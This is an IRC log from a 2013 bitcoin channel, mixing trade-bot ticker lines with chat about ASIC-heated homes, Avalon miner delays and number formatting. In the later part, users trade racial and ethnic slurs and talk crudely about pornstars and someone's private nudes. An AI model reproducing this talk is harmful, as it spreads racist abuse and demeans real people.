there, bitcoin for dummys? Aug 26 02:06:27 [BTCTC] [LABCOIN] 498 @ 0.003435 = 1.7106 BTC [-] Aug 26 02:06:35 a market definitely is there. Aug 26 02:06:49 get Diablo-D3 to write it, bitcoin dummys on dummys Aug 26 02:07:02 what's worse, max keiser probably already hired taaki to ghostwrite it Aug 26 02:07:52 [BTCTC] [LABCOIN] 500 @ 0.003435 = 1.7175 BTC [-] Aug 26 02:08:58 dub http://d1nx6mcwdpv1xd.cloudfront.net/images/2/2011/10/louscomicgettingin_1868.jpg (lou charmelle) vs http://www.hollywoodreporter.com/sites/default/files/2012/07/sarah_a.jpg (sarah silverman) Aug 26 02:09:03 i say the french version is way better. Aug 26 02:09:22 im at work Aug 26 02:09:30 you wouldn't be if you were french. Aug 26 02:09:49 [BTCTC] [DMS.MINING] 1 @ 0.003419 BTC [-] Aug 26 02:09:51 [BTCTC] [DMS.MINING] 17 @ 0.0034 = 0.0578 BTC [-] Aug 26 02:09:52 or slovenian. Aug 26 02:10:09 nice ass btw Aug 26 02:10:28 the second pic i dunno Aug 26 02:10:37 its sfw so its bannable offense¨! Aug 26 02:10:42 [BTCTC] [LABCOIN] 500 @ 0.003435 = 1.7175 BTC [-] Aug 26 02:10:43 american women have forgotten how to sexy Aug 26 02:10:52 why? Aug 26 02:10:59 why is assbot consistently broken stats from btct? i.e just now [BTCTC] [ACTIVEMINING] 17 @ 0.005414 = 0.092 BTC [-] was a buy, not sell Aug 26 02:11:04 kakobrekla it's this loud mouthed libertard "comedian" that's not funny. Aug 26 02:11:22 she keeps trying to buy relevancy by being politically correct and what she thinks counts as clever. Aug 26 02:11:26 fix it kakobrekla, prompto Aug 26 02:11:41 it works as it should. Aug 26 02:12:04 sorta modern day tokyo rose Aug 26 02:12:46 there is a discrepancy between what its outputting and whats on btct Aug 26 02:13:02 bobbabad + does not mean its a buy and - does not mean its a sell Aug 26 02:13:08 oh Aug 26 02:13:22 it could be, but it does not have to be Aug 26 02:13:30 what does it mean then? Aug 26 02:13:34 bobbabad: http://en.wikipedia.org/wiki/Candlestick_chart Aug 26 02:13:36 what do you think? Aug 26 02:13:38 higher or lower than prev price. Aug 26 02:13:49 [BTCTC] [DMS.MINING] 2 @ 0.003415 = 0.0068 BTC [+] Aug 26 02:14:03 aha Aug 26 02:14:15 you can see the direction of the price Aug 26 02:14:33 [BTCTC] [ACTIVEMINING] 6 @ 0.005427 = 0.0326 BTC [-] Aug 26 02:14:34 I see Aug 26 02:15:38 [MPEX] [S.MPOE] 2223 @ 0.00085645 = 1.9039 BTC [+] Aug 26 02:15:53 [MPEX] [S.MPOE] 7900 @ 0.0008582 = 6.7798 BTC [+] Aug 26 02:16:30 [BTCTC] [LABCOIN] 555 @ 0.003436 = 1.907 BTC [+] Aug 26 02:17:10 [BTCTC] [LABCOIN] 80 @ 0.003477 = 0.2782 BTC [+] Aug 26 02:19:23 [BTCTC] [LABCOIN] 32 @ 0.003478 = 0.1113 BTC [+] Aug 26 02:20:20 [BTCTC] [DMS.MINING] 50 @ 0.003315 = 0.1658 BTC [-] Aug 26 02:20:21 [BTCTC] [DMS.MINING] 4 @ 0.003314 = 0.0133 BTC [-] Aug 26 02:20:23 [BTCTC] [DMS.MINING] 46 @ 0.003313 = 0.1524 BTC [-] Aug 26 02:21:36 [BTCTC] [DMS.PURCHASE] 100 @ 0.01606 = 1.606 BTC [+] Aug 26 02:25:16 ♥ lou charmelle Aug 26 02:25:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.02717 = 0.0543 BTC [-] Aug 26 02:25:37 angell summers too hehe Aug 26 02:25:53 you have good tastes in French pornstars Aug 26 02:25:55 [BTCTC] [DMS.MINING] 15 @ 0.003415 = 0.0512 BTC [+] Aug 26 02:26:22 [BTCTC] [DMS.MINING] 1 @ 0.003415 BTC [+] Aug 26 02:26:36 does angell have a nice real bush like lou? Aug 26 02:26:37 that exclusively. Aug 26 02:27:57 [BTCTC] [LABCOIN] 20 @ 0.003385 = 0.0677 BTC [-] Aug 26 02:28:11 I don't think so Aug 26 02:28:51 [BTCTC] [LABCOIN] 20 @ 0.003386 = 0.0677 BTC [+] Aug 26 02:29:30 ;;calc 0.012440 + 0.003313 Aug 26 02:29:30 0.015753 Aug 26 02:29:38 ;;calc 0.013440 + 0.003313 Aug 26 02:29:38 0.016753 Aug 26 02:29:46 ;;calc 0.013340 + 0.003313 Aug 26 02:29:46 0.016653 Aug 26 02:29:58 ;;calc 0.013000 + 0.003313 Aug 26 02:29:59 0.016313 Aug 26 02:30:14 http://thenextweb.com/insider/2013/08/23/house-warming-this-startup-wants-to-heat-your-home-with-computing-power/ Aug 26 02:30:16 This Startup Wants to Heat Your Home With Computers Aug 26 02:30:24 why do i doubt that they heard of btc Aug 26 02:31:03 a few years ago there was a startup who wanted to pay your fiber access if you hosted two computers Aug 26 02:31:05 [BTCTC] [LABCOIN] 20 @ 0.003385 = 0.0677 BTC [-] Aug 26 02:31:27 however I don't think fiber deployment got fast enough for them to work Aug 26 02:32:23 and well, mining when their servers are idle would have helped too… Aug 26 02:32:50 not with generic cpus Aug 26 02:32:59 [HAVELOCK] [LABCO] 8 @ 0.00324 = 0.0259 BTC [-] Aug 26 02:33:01 and they want to do video transcoding remote Aug 26 02:33:04 but it has many advantages, you can have redundant multisite storage very easily Aug 26 02:33:07 yeah right, on my 56k modem Aug 26 02:33:18 they can mine primecoin :p Aug 26 02:33:22 May 12 20:12:54 benkay i seriously think houses will be built with asic floor heating in 10-20 years Aug 26 02:33:24 i can hash just fine with 3g Aug 26 02:33:33 its gonna happen i tel lyou. Aug 26 02:33:49 [HAVELOCK] [AM100] 15 @ 0.02605 = 0.3908 BTC [-] Aug 26 02:33:51 the chinese will make asic-ready floor tiles. Aug 26 02:33:56 yeah i know we had this discussion a few times over past 2 or 3 years Aug 26 02:34:09 death and taxes already has this kind of setup for a while iirc Aug 26 02:34:11 [HAVELOCK] [AM100] 5 @ 0.02600001 = 0.13 BTC [-] Aug 26 02:34:14 o he does ? Aug 26 02:34:24 yeah but with gpus Aug 26 02:34:33 not in the floor ofc Aug 26 02:34:35 i vaguely remember someone wanting to do it Aug 26 02:34:36 [HAVELOCK] [LABCO] 10 @ 0.003 = 0.03 BTC [-] Aug 26 02:34:37 oh. Aug 26 02:34:48 well anyone mining with gpus has that set=up so to speak Aug 26 02:34:50 just cooling those GPUs with water Aug 26 02:34:56 and using that hot water to heat the house Aug 26 02:35:02 etc Aug 26 02:35:03 [HAVELOCK] [AM100] 7 @ 0.026 = 0.182 BTC [-] Aug 26 02:35:26 [BTCTC] [LABCOIN] 20 @ 0.003386 = 0.0677 BTC [+] Aug 26 02:35:27 [BTCTC] [LABCOIN] 1 @ 0.003385 BTC [-] Aug 26 02:35:35 https://bitcointalk.org/index.php?topic=66606.60 Aug 26 02:35:41 A journey of extreme watercooling: Cooling a rack of GPU servers without AC. Aug 26 02:35:44 omg beast Aug 26 02:35:48 datacenters already have smart water reuse Aug 26 02:35:58 [HAVELOCK] [LABCO] 1200 @ 0.003 = 3.6 BTC [-] Aug 26 02:36:14 build a datacenter on each building basement, get free water heating :p Aug 26 02:36:25 [HAVELOCK] [AM100] 8 @ 0.02600001 = 0.208 BTC [+] Aug 26 02:37:02 hmm Aug 26 02:37:05 maybe its not the right thread Aug 26 02:37:24 not sure Aug 26 02:37:33 but i have a vauge memory of someone doing that Aug 26 02:39:48 [BTCTC] [LABCOIN] 1 @ 0.003385 BTC [-] Aug 26 02:39:48 [BTCTC] [LABCOIN] 1 @ 0.003376 BTC [-] Aug 26 02:39:50 [BTCTC] [LABCOIN] 1 @ 0.003375 BTC [-] Aug 26 02:39:51 [BTCTC] [LABCOIN] 91 @ 0.003301 = 0.3004 BTC [-] Aug 26 02:40:39 [BTCTC] [LABCOIN] 21 @ 0.003304 = 0.0694 BTC [+] Aug 26 02:40:41 [BTCTC] [LABCOIN] 21 @ 0.003303 = 0.0694 BTC [-] Aug 26 02:40:42 [BTCTC] [LABCOIN] 8 @ 0.003302 = 0.0264 BTC [-] Aug 26 02:42:07 dunno. Aug 26 02:42:24 reminds me of http://pigroll.com/img/nvidia_cooler.jpg Aug 26 02:42:28 mebbe he was just talking about it. Aug 26 02:44:53 [BTCTC] [LABCOIN] 10 @ 0.003309 = 0.0331 BTC [+] Aug 26 02:44:55 [BTCTC] [LABCOIN] 10 @ 0.003308 = 0.0331 BTC [-] Aug 26 02:45:07 http://www.onami.us/index.php/commercialization/current_gap_projects/applied_exergy Aug 26 02:45:09 plus asics Aug 26 02:45:10 ONAMI | Applied Exergy / Oregon State University Aug 26 02:45:42 [BTCTC] [LABCOIN] 20 @ 0.003307 = 0.0661 BTC [-] Aug 26 02:46:48 [BTCTC] [LABCOIN] 5 @ 0.003307 = 0.0165 BTC [-] Aug 26 02:46:49 [BTCTC] [LABCOIN] 20 @ 0.003306 = 0.0661 BTC [-] Aug 26 02:46:50 [BTCTC] [LABCOIN] 125 @ 0.003304 = 0.413 BTC [-] Aug 26 02:46:51 [BTCTC] [LABCOIN] 495 @ 0.003303 = 1.635 BTC [-] Aug 26 02:47:09 [BTCTC] [DMS.SELLING] 50 @ 0.01244 = 0.622 BTC [+] Aug 26 02:47:49 [BTCTC] [LABCOIN] 5 @ 0.003304 = 0.0165 BTC [+] Aug 26 02:47:51 [BTCTC] [LABCOIN] 5 @ 0.003303 = 0.0165 BTC [-] Aug 26 02:47:52 [BTCTC] [LABCOIN] 714 @ 0.003302 = 2.3576 BTC [-] Aug 26 02:47:53 [BTCTC] [LABCOIN] 1341 @ 0.003302 = 4.428 BTC [-] Aug 26 02:48:01 [BTCTC] [DMS.SELLING] 65 @ 0.01243 = 0.808 BTC [-] Aug 26 02:48:03 [BTCTC] [DMS.SELLING] 10 @ 0.01243 = 0.1243 BTC [-] Aug 26 02:48:37 let's do some math. Aug 26 02:48:49 yes! Aug 26 02:48:50 the wrold uses something like 150-200 PWh Aug 26 02:49:03 about half of this is used for heating Aug 26 02:49:32 if you have an average utilization efficiency of 1 Gh/W in the average asic brick Aug 26 02:50:06 ;;calc 1**9 * 150 ** 15 / 2 / 365 / 24 / 6 Aug 26 02:50:06 4165657252481538515397509120 Aug 26 02:50:16 that many Gh/block. Aug 26 02:50:25 half of all elect is heating!? Aug 26 02:50:26 aw i fuckt the math Aug 26 02:50:31 ;;calc 1**9 * 15 * 10 ** 15 / 2 / 365 / 24 / 6 Aug 26 02:50:31 1.42694063927e+11 Aug 26 02:50:33 nowai Aug 26 02:50:44 kakobrekla half of ENERGY consumption. not just elec, all of it. Aug 26 02:50:56 thats better yea Aug 26 02:51:04 some countries have a lot of electrical heating though Aug 26 02:51:36 so if the average block is found in 1.4e+11 hashes Aug 26 02:51:39 what's the difficulty then ? Aug 26 02:52:09 over 9000 Aug 26 02:52:39 is it exactly 1.4e+11 ? Aug 26 02:55:03 don't know what you're running there Aug 26 02:55:50 [BTCTC] [TAT.ASICMINER] 67 @ 0.02821 = 1.8901 BTC [+] Aug 26 02:55:52 yearly world energy consumption * (hash/watt) / 365 days / 24 hours / 10 bnlocks an hour Aug 26 02:56:03 for a 50% chance i guess. Aug 26 02:56:41 kakobrekla so then difficulty in the range of 140`000`000`000`000`000`000 is theoretically possible Aug 26 02:57:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.02769 = 0.0831 BTC [-] Aug 26 02:58:14 bye bye gpu mining. Aug 26 02:58:52 if this is uniformly distributed then the average person will hash Aug 26 02:59:13 ;;calc 25*6*24*365 / 8000000000 Aug 26 02:59:14 0.00016425 Aug 26 02:59:22 [BTCTC] [LABCOIN] 2 @ 0.003316 = 0.0066 BTC [+] Aug 26 02:59:22 about 0.1 milibitcoinz a year Aug 26 02:59:23 [BTCTC] [LABCOIN] 2 @ 0.003315 = 0.0066 BTC [-] Aug 26 02:59:23 [BTCTC] [LABCOIN] 5 @ 0.003312 = 0.0166 BTC [-] Aug 26 02:59:34 yeah but its gonna be ev- Aug 26 02:59:42 notrly cause heating your house anyway Aug 26 03:00:00 and if asic development follows typical silicon deployment patterns, those chips'll be everywhere pretty dang soon Aug 26 03:00:47 i mean you wont make money with heathashing Aug 26 03:00:55 if this is to be in equilibrium then that 0.0001 btc a year also covers a person's heating bill Aug 26 03:01:04 which means that the bitcoin will be something like 10mn a piece. Aug 26 03:01:15 which is not gonna happen Aug 26 03:01:19 ugh you're going to start another bubble Aug 26 03:01:21 [BTCTC] [ASICMINER-PT] 1 @ 2.896 BTC [-] Aug 26 03:01:27 i recant. Aug 26 03:01:36 i was merely speaking extemporaneously. Aug 26 03:01:36 recant? Aug 26 03:01:44 ;;ud recant Aug 26 03:01:44 http://www.urbandictionary.com/define.php?term=recant | After Someone argue,give opinion,allege,and assist his or her thought, he or she does not accept or withdraw his or her previous comment or convict... Aug 26 03:01:46 Urban Dictionary: recant Aug 26 03:01:58 STRIKE IT FROM THE RECORD! Aug 26 03:02:20 aha Aug 26 03:02:49 those that recant recunt Aug 26 03:03:07 i am thumbsing that definition down Aug 26 03:03:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.02811 = 0.1687 BTC [+] Aug 26 03:03:34 with great prejudice. Aug 26 03:04:00 [BTCTC] [ACTIVEMINING] 10 @ 0.005413 = 0.0541 BTC [-] Aug 26 03:04:04 lol y ? Aug 26 03:04:53 because it makes me feel better about the world. Aug 26 03:05:35 i like to pretend that when I downvote things the idiot who posted them in the first place gets a night of indigestion. Aug 26 03:05:54 [BTCTC] [S.MPOE-PT] 1 @ 0.0008994 BTC [-] Aug 26 03:06:00 chick sends me nudies, i notice dildo and 6 INCH SCISSORS drying in the dishrack among cutlery. Aug 26 03:06:09 what the fuck 0.0 Aug 26 03:06:12 [BTCTC] [LABCOIN] 2 @ 0.003416 = 0.0068 BTC [+] Aug 26 03:06:13 [BTCTC] [LABCOIN] 5 @ 0.003421 = 0.0171 BTC [+] Aug 26 03:06:15 [BTCTC] [LABCOIN] 125 @ 0.003428 = 0.4285 BTC [+] Aug 26 03:06:16 [BTCTC] [LABCOIN] 500 @ 0.003429 = 1.7145 BTC [+] Aug 26 03:06:17 [BTCTC] [LABCOIN] 250 @ 0.003434 = 0.8585 BTC [+] Aug 26 03:06:18 [BTCTC] [LABCOIN] 1000 @ 0.003435 = 3.435 BTC [+] Aug 26 03:06:19 [BTCTC] [LABCOIN] 20 @ 0.003435 = 0.0687 BTC [+] Aug 26 03:06:50 urlpls Aug 26 03:07:22 these are noninternetable nudies. Aug 26 03:07:37 [BTCTC] [DMS.SELLING] 7 @ 0.01241 = 0.0869 BTC [-] Aug 26 03:07:37 [BTCTC] [DMS.SELLING] 20 @ 0.01241 = 0.2482 BTC [-] Aug 26 03:07:37 [BTCTC] [DMS.SELLING] 14 @ 0.01228 = 0.1719 BTC [-] Aug 26 03:08:09 [BTCTC] [LABCOIN] 500 @ 0.003435 = 1.7175 BTC [+] Aug 26 03:08:17 ill ask again in april Aug 26 03:08:18 [BTCTC] [TAT.MINIGAME] 2 @ 0.000269 = 0.0005 BTC [+] Aug 26 03:08:29 lol good plan Aug 26 03:09:00 [BTCTC] [LABCOIN] 498 @ 0.003435 = 1.7106 BTC [+] Aug 26 03:09:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.02861 = 0.0858 BTC [+] Aug 26 03:10:35 you're surprised by the scissors, not the dildo? Aug 26 03:10:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.02769 BTC [-] Aug 26 03:10:55 also inches Aug 26 03:11:18 well... you do need to wash the dildo i guess... Aug 26 03:11:28 it goes in the mouth like everything else in there i guess... Aug 26 03:11:37 but wtf would involve scissors too Aug 26 03:12:01 oh. I just guessed it wasn't related to the dildo Aug 26 03:12:11 scissors can be useful kitchen tools. if it's in with the cutlery...occam? Aug 26 03:12:17 [BTCTC] [LABCOIN] 21 @ 0.003445 = 0.0723 BTC [+] Aug 26 03:12:19 [BTCTC] [LABCOIN] 21 @ 0.003446 = 0.0724 BTC [+] Aug 26 03:12:19 some people like knife play though Aug 26 03:12:20 [BTCTC] [LABCOIN] 20 @ 0.003446 = 0.0689 BTC [+] Aug 26 03:12:21 [BTCTC] [LABCOIN] 176 @ 0.003449 = 0.607 BTC [+] Aug 26 03:12:21 [BTCTC] [LABCOIN] 137 @ 0.00345 = 0.4727 BTC [+] Aug 26 03:12:34 I'm surprised you use inches not centimeters Aug 26 03:13:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.02811 BTC [+] Aug 26 03:13:10 you'll be more surprised to find i use centimeters in spanish, french, romanian etc. Aug 26 03:13:56 I don't translate, americans have to learn the better unit system Aug 26 03:14:55 a tit by any other name... Aug 26 03:16:41 [BTCTC] [ACTIVEMINING] 50 @ 0.005301 = 0.2651 BTC [-] Aug 26 03:16:43 [BTCTC] [ACTIVEMINING] 50 @ 0.0053 = 0.265 BTC [-] Aug 26 03:17:00 [HAVELOCK] [AM100] 1 @ 0.0260001 BTC [+] Aug 26 03:17:19 [HAVELOCK] [AM100] 83 @ 0.0260001 = 2.158 BTC [+] Aug 26 03:18:08 [BTCTC] [LABCOIN] 3 @ 0.003429 = 0.0103 BTC [-] Aug 26 03:18:09 [BTCTC] [LABCOIN] 9 @ 0.00343 = 0.0309 BTC [+] Aug 26 03:20:26 [BTCTC] [LABCOIN] 55 @ 0.003427 = 0.1885 BTC [-] Aug 26 03:20:27 [BTCTC] [LABCOIN] 67 @ 0.003428 = 0.2297 BTC [+] Aug 26 03:20:27 [BTCTC] [LABCOIN] 228 @ 0.00343 = 0.782 BTC [+] Aug 26 03:21:25 [BTCTC] [LABCOIN] 85 @ 0.003342 = 0.2841 BTC [-] Aug 26 03:22:53 [BTCTC] [ASICMINER-PT] 1 @ 2.847 BTC [-] Aug 26 03:22:54 [BTCTC] [ASICMINER-PT] 1 @ 2.846 BTC [-] Aug 26 03:22:55 [BTCTC] [ASICMINER-PT] 3 @ 2.845 = 8.535 BTC [-] Aug 26 03:25:12 [BTCTC] [LABCOIN] 20 @ 0.003428 = 0.0686 BTC [+] Aug 26 03:27:31 [BTCTC] [LABCOIN] 20 @ 0.003429 = 0.0686 BTC [+] Aug 26 03:29:55 https://sites.google.com/site/boycotavalon/ Aug 26 03:29:56 lol Aug 26 03:29:57 Boycot Avalon Aug 26 03:30:02 getting the BFL tretment Aug 26 03:30:11 treatment Aug 26 03:30:13 what is that picture? Aug 26 03:30:22 what ahppened to avalon? Aug 26 03:30:26 i thought avalon was legit? Aug 26 03:30:29 well Aug 26 03:30:35 ngzang is being ethical and all Aug 26 03:30:38 thats what happend. Aug 26 03:30:42 ethical? Aug 26 03:30:43 what? Aug 26 03:30:51 just ask midnightmagic Aug 26 03:30:51 people murdering people with his chips? Aug 26 03:30:58 midnightmagic what goin on? Aug 26 03:31:38 or for fucks sakes read trilema here and there Aug 26 03:32:34 which trilema article? :P Aug 26 03:32:37 Mr. kakobrekla Aug 26 03:32:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.0275 = 0.0825 BTC [-] Aug 26 03:33:29 http://trilema.com/2013/in-which-we-aspersor/ Aug 26 03:33:32 In which we aspersor pe Trilema - Un blog de Mircea Popescu. Aug 26 03:33:38 lets also try this Aug 26 03:33:41 ;;google trilema midnightmagic Aug 26 03:33:42 The bitchslapping of 2013… pe Trilema - Un blog de Mircea Popescu.: ; In which we aspersor pe Trilema - Un blog de Mircea Popescu.: ; Rating Details for User 'mircea_popescu' - Bitcoin-OTC: Aug 26 03:33:48 thar. Aug 26 03:34:21 [BTCTC] [TAT.ASICMINER] 27 @ 0.02828 = 0.7636 BTC [+] Aug 26 03:34:40 weird selection. Aug 26 03:35:23 anyway, nzhang/avalon is a thorny subject, because it seems like it's either gypping some customers selectively in a most fraudulent manner or else is beleaguered with asshats. i can't call it. Aug 26 03:35:47 a friend of mine got batch 3 order couple of days ago Aug 26 03:35:54 the earlier ethicalness dispute is related to nzhang randomly increasing the price of the units people gave him money to develop on the grounds that fuck you. Aug 26 03:36:26 but that ealier thing is rather mild and miore of a "principle of the matter" thing than anything else Aug 26 03:36:33 dunno if he will see a roi on it Aug 26 03:36:53 kakobrekla ya bur some people are really vocal about NOT receiving theirs. Aug 26 03:37:06 while a bunch do seem to have received. Aug 26 03:37:27 in either case Aug 26 03:37:33 the wait time is unacceptable Aug 26 03:38:18 certainly not as advertuised Aug 26 03:38:30 nothing is. Aug 26 03:39:28 isn't it scandalous? Aug 26 03:39:36 i guess so far asicminer is pretty much the closest to advertised Aug 26 03:39:48 so avalon is false advertising? Aug 26 03:40:31 well, they delivered a bunch in spring Aug 26 03:40:52 that was pre-=order stuff Aug 26 03:40:57 seems to have slacked a lot after that Aug 26 03:41:08 they made the bank Aug 26 03:41:10 whats the rush?! Aug 26 03:41:28 https://bitcointalk.org/index.php?topic=163703.0 Aug 26 03:41:32 related Aug 26 03:41:33 Survey about the status of Avalon batch 1 deliveries Aug 26 03:41:52 [BTCTC] [ASICMINER-PT] 1 @ 2.896 BTC [+] Aug 26 03:41:53 [BTCTC] [ASICMINER-PT] 1 @ 2.897 BTC [+] Aug 26 03:42:25 chinapower Aug 26 03:43:53 [BTCTC] [COGNITIVE] 2 @ 0.302 = 0.604 BTC [-] Aug 26 03:43:54 [BTCTC] [COGNITIVE] 2 @ 0.3 = 0.6 BTC [-] Aug 26 03:43:55 [BTCTC] [COGNITIVE] 2 @ 0.299 = 0.598 BTC [-] Aug 26 03:43:57 [BTCTC] [COGNITIVE] 4 @ 0.2911 = 1.1644 BTC [-] Aug 26 03:46:00 [BTCTC] [TAT.ASICMINER] 29 @ 0.02722 = 0.7894 BTC [-] Aug 26 03:46:15 [BTCTC] [TAT.ASICMINER] 21 @ 0.02721 = 0.5714 BTC [-] Aug 26 03:47:42 friend of mine has batch 3 avalon in hand Aug 26 03:48:22 [BTCTC] [DMS.SELLING] 105 @ 0.01299 = 1.364 BTC [+] Aug 26 03:49:55 avalon is oldlol by now Aug 26 03:50:18 yeah whats teh newlol news Aug 26 03:50:30 how is ken coming along with his sasic Aug 26 03:50:32 life time of the chip they developed, 6months? Aug 26 03:51:07 Diablo-D3: I has bfl in hand btw, its paid for itself and appears to exist Aug 26 03:52:59 lol, it can't be too late Aug 26 03:53:09 per design Aug 26 03:53:38 if it was ever 'too late' to mine btc, difficulty would decline until it wasn't too late :D Aug 26 03:54:47 gecko_x2 depends how much you paid for any one miner. Aug 26 03:54:55 not everyone buys at the same price as you do Aug 26 03:55:45 what price Aug 26 03:56:52 mk. Aug 26 03:59:25 [BTCTC] [DMS.PURCHASE] 60 @ 0.01606 = 0.9636 BTC [+] Aug 26 04:05:18 [BTCTC] [MININGCO.ETF] 5 @ 0.1175 = 0.5875 BTC [+] Aug 26 04:05:19 [BTCTC] [MININGCO.ETF] 10 @ 0.12 = 1.2 BTC [+] Aug 26 04:08:28 presumably gecko_x2 has a recent bfl order Aug 26 04:08:47 uhm, i have nothing of the kind Aug 26 04:09:15 :p Aug 26 04:09:37 well you'd make the perfect customer Aug 26 04:09:46 but incidentally i was just checking out avalons on german ebay Aug 26 04:10:12 http://www.ebay.de/itm/Avalon-ASIC-Bitcoin-Miner-Batch-2-85-GH-s-IN-HAND-SOFORT-MINEN-/200956524136?pt=DE_Computer_Sonstige&hash=item2ec9f13668 Aug 26 04:10:15 Avalon ASIC Bitcoin Miner Batch #2 85 GH/s IN HAND / SOFORT MINEN | eBay Aug 26 04:10:17 [BTCTC] [LABCOIN] 20 @ 0.003381 = 0.0676 BTC [-] Aug 26 04:10:18 [BTCTC] [LABCOIN] 100 @ 0.00338 = 0.338 BTC [-] Aug 26 04:10:18 6 days left Aug 26 04:11:04 I guess thats 100 euro? Aug 26 04:11:14 current bid Aug 26 04:11:24 they have to go for more than that Aug 26 04:12:42 you'd think so Aug 26 04:13:12 uhh there's another for 13.000 EUR Aug 26 04:13:26 that is more like it Aug 26 04:13:26 how much is that? Aug 26 04:13:39 ;;calc 13000/90 Aug 26 04:13:39 144.444444444 Aug 26 04:13:41 that many btc Aug 26 04:13:47 they sold for like 100 irc ? Aug 26 04:13:52 is there any kind of standard to , and . with you eurofags? Aug 26 04:13:55 88 Aug 26 04:13:57 another with 1 day left for 4232 Aug 26 04:13:58 there is another one for 8k euro instantly.. but looks fishy Aug 26 04:14:04 http://www.ebay.de/sch/i.html?_trksid=p5197.m570.l1313.TR0.TRC0.Xbitcoin+asic&_nkw=bitcoin+asic&_sacat=0&_from=R40 Aug 26 04:14:09 bitcoin asic | eBay Aug 26 04:14:13 dub yes, the standard is ` Aug 26 04:14:20 dont listen to mp Aug 26 04:14:24 13.000 is 13 Aug 26 04:14:30 101,00 is nothing at all Aug 26 04:14:38 the standard is the correct one Aug 26 04:14:39 whatever Aug 26 04:14:41 the other way around Aug 26 04:14:42 13K Aug 26 04:14:47 compared to mericans Aug 26 04:15:02 13;000:0 Aug 26 04:15:09 [HAVELOCK] [AM100] 1 @ 0.026999 BTC [+] Aug 26 04:15:13 yes 13, its 1 o clock. Aug 26 04:15:30 13thousandoclocks Aug 26 04:15:49 that is called twelfty Aug 26 04:16:01 anyway, stop it eurofags Aug 26 04:16:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.02797 = 0.0559 BTC [+] Aug 26 04:16:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.02798 = 0.056 BTC [+] Aug 26 04:16:15 get some education nigger Aug 26 04:16:22 use . for decimal place, there is no reason to break up numbers further Aug 26 04:17:13 education is for niggers Aug 26 04:17:15 what's wrong with coma Aug 26 04:17:16 ask Diablo-D3 Aug 26 04:17:22 :) Aug 26 04:17:24 atleast being an eurofag is better than being a corporate fascist yankee doodle Aug 26 04:17:27 whats right with it Aug 26 04:18:21 actually why comas point left ? Aug 26 04:18:23 if you get tired of reading ever third character and need a break I have bad news for you Aug 26 04:18:26 i want a right pointing comma Aug 26 04:19:20 i want icecream Aug 26 04:19:32 [BTCTC] [LABCOIN] 5 @ 0.00342 = 0.0171 BTC [+] Aug 26 04:19:33 [BTCTC] [LABCOIN] 20 @ 0.003421 = 0.0684 BTC [+] Aug 26 04:19:35 [BTCTC] [LABCOIN] 1 @ 0.003424 BTC [+] Aug 26 04:19:36 [BTCTC] [LABCOIN] 100 @ 0.003425 = 0.3425 BTC [+] Aug 26 04:19:37 [BTCTC] [LABCOIN] 161 @ 0.003427 = 0.5517 BTC [+] Aug 26 04:19:37 [BTCTC] [LABCOIN] 150 @ 0.003428 = 0.5142 BTC [+] Aug 26 04:19:38 [BTCTC] [LABCOIN] 272 @ 0.00343 = 0.933 BTC [+] Aug 26 04:19:39 [BTCTC] [LABCOIN] 222 @ 0.00343 = 0.7615 BTC [+] Aug 26 04:19:40 [BTCTC] [LABCOIN] 130 @ 0.003459 = 0.4497 BTC [+] Aug 26 04:19:41 [BTCTC] [LABCOIN] 715 @ 0.003479 = 2.4875 BTC [+] Aug 26 04:19:42 [BTCTC] [LABCOIN] 1110 @ 0.00348 = 3.8628 BTC [+] Aug 26 04:19:43 [BTCTC] [LABCOIN] 750 @ 0.00348 = 2.61 BTC [+] Aug 26 04:19:44 [BTCTC] [LABCOIN] 1000 @ 0.00348 = 3.48 BTC [+] Aug 26 04:19:46 [BTCTC] [LABCOIN] 1500 @ 0.003487 = 5.2305 BTC [+] Aug 26 04:19:47 [BTCTC] [LABCOIN] 500 @ 0.003488 = 1.744 BTC [+] Aug 26 04:19:48 [BTCTC] [LABCOIN] 449 @ 0.003489 = 1.5666 BTC [+] Aug 26 04:19:48 [BTCTC] [LABCOIN] 500 @ 0.003499 = 1.7495 BTC [+] Aug 26 04:19:49 [BTCTC] [LABCOIN] 100 @ 0.0035 = 0.35 BTC [+] Aug 26 04:19:50 [BTCTC] [LABCOIN] 100 @ 0.0035 = 0.35 BTC [+] Aug 26 04:19:51 [BTCTC] [LABCOIN] 95 @ 0.003509 = 0.3334 BTC [+] Aug 26 04:24:54 http://archive.org/details/LetsPlay Aug 26 04:24:57 Online Casino No Deposit Bonus. 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Aug 26 04:25:15 [BTCTC] [ASICMINER-PT] 1 @ 2.784 BTC [-] Aug 26 04:25:48 that lit my av up Aug 26 04:26:55 [BTCTC] [LABCOIN] 65 @ 0.003549 = 0.2307 BTC [+] Aug 26 04:28:25 [BTCTC] [LABCOIN] 38 @ 0.00355 = 0.1349 BTC [+] Aug 26 04:29:47 dub: for frenchfags '.' = ',' and ',' = ' ' Aug 26 04:30:13 it makes parsing amounts on websites very annoying Aug 26 04:30:37 but at least it's more recognizable than d/m/y vs. m/d/y Aug 26 04:32:14 yes fucing americans and thier m/d/y Aug 26 04:32:52 [BTCTC] [LABCOIN] 7 @ 0.00355 = 0.0249 BTC [+] Aug 26 04:36:15 i like yyyy.mm.dd and 24 hour clocks Aug 26 04:36:27 [HAVELOCK] [HIM] 1 @ 0.197 BTC [+] Aug 26 04:36:29 but everyone else thinks im weird **** BEGIN LOGGING AT Mon Aug 26 12:49:39 2013 Aug 26 12:49:45 [BTCTC] [ASICMINER-PT] 1 @ 2.641 BTC [-] Aug 26 12:49:46 [BTCTC] [LABCOIN] 98 @ 0.003658 = 0.3585 BTC [-] Aug 26 12:50:38 [BTCTC] [LABCOIN] 115 @ 0.003658 = 0.4207 BTC [-] Aug 26 12:50:39 [BTCTC] [LABCOIN] 55 @ 0.003659 = 0.2012 BTC [+] Aug 26 12:51:19 [BTCTC] [LABCOIN] 5 @ 0.003659 = 0.0183 BTC [+] Aug 26 12:54:08 [BTCTC] [DMS.MINING] 108 @ 0.003413 = 0.3686 BTC [-] Aug 26 12:57:13 [MPEX] [S.MPOE] 3746 @ 0.00086252 = 3.231 BTC [-] Aug 26 12:57:15 [MPEX] [S.MPOE] 3254 @ 0.0008645 = 2.8131 BTC [+] Aug 26 13:01:23 